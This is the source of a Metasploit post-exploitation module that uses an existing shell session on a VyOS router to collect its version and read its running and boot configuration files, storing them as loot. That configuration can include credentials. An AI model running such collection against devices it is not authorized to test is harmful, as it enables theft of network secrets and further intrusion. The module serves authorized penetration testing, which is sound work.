modules/post/networking/gather/enum_vyos.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Post
include Msf::Auxiliary::VYOS
def initialize(info = {})
super(
update_info(
info,
'Name' => 'VyOS Gather Device General Information',
'Description' => %q{
This module collects VyOS device information and configuration.
},
'License' => MSF_LICENSE,
'Author' => ['h00die'],
'SessionTypes' => ['shell'],
'Notes' => {
'Stability' => [CRASH_SAFE],
'SideEffects' => [IOC_IN_LOGS],
'Reliability' => []
}
)
)
end
def run
# Clear the screen
session.shell_command("\n")
# Get version info
print_status('Getting version information')
# 1.1.8, and prob before
version_out = session.shell_command('/opt/vyatta/bin/vyatta-show-version')
if version_out.include?('such file or directory')
# 1.3, and prob newer
version_out = session.shell_command('/usr/libexec/vyos/op_mode/show_version.py')
end
ver_loc = store_loot('vyos.version',
'text/plain',
session,
version_out.strip,
'version.txt',
'VyOS Version')
# Print the version of VERBOSE set to true.
vprint_good(version_out)
vprint_good("Version information stored in to loot #{ver_loc}")
# run additional information gathering
enum_configs
end
# run commands found in exec mode under privilege 1
def enum_configs
host = session.session_host
port = session.session_port
exec_commands = [
{
'cmd' => 'cat /config/config',
'fn' => 'get_running_config',
'desc' => 'Get Running Config on VyOS Device'
},
{
'cmd' => 'cat /config/config.boot',
'fn' => 'get_config',
'desc' => 'Get Boot Config on VyOS Device'
},
]
exec_commands.each do |ec|
command = ec['cmd']
cmd_out = session.shell_command(command).gsub(command, '')
print_status("Gathering info from #{command}")
vyos_config_eater(host, port, cmd_out.strip)
end
end
end